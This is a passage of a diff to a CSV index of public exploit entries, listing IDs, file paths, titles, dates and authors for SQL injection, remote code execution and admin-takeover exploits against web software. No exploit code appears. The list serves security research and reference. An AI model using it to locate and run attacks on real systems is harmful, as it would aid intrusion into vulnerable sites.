1237,exploits/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,webapps,php,
1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,
1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,webapps,php,
1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover (SQL Injection)",2005-10-08,rgod,webapps,php,
1244,exploits/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,webapps,php,
1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,webapps,php,
1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)",2005-10-10,rgod,webapps,php,
1250,exploits/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,webapps,php,
1252,exploits/asp/webapps/1252.html,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,webapps,asp,
1270,exploits/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,webapps,php,
@ -20251,7 +20253,7 @@ id,file,description,date,author,type,platform,port
6417,exploits/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,webapps,php,
6419,exploits/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,webapps,php,
6420,exploits/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,webapps,asp,
6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover",2008-09-10,iso^kpsbr,webapps,php,
6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)",2008-09-10,iso^kpsbr,webapps,php,
6422,exploits/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,webapps,php,
6423,exploits/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,webapps,php,
6425,exploits/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",webapps,php,
@ -28333,7 +28335,7 @@ id,file,description,date,author,type,platform,port
25437,exploits/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",webapps,php,
25438,exploits/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",webapps,php,
25440,exploits/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,webapps,php,
25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",webapps,php,
25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Takeover",2013-05-14,"John JEAN",webapps,php,
25442,exploits/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",webapps,php,
25447,exploits/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,webapps,php,
25449,exploits/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",webapps,php,
@ -37997,7 +37999,7 @@ id,file,description,date,author,type,platform,port
41150,exploits/php/webapps/41150.md,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80
41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php,
41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php,
41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php,
41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin Takeover",2017-01-20,"Charles Fol",webapps,php,
41159,exploits/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,webapps,php,
41166,exploits/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
41167,exploits/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
@ -39675,3 +39677,9 @@ id,file,description,date,author,type,platform,port
45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,
45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,
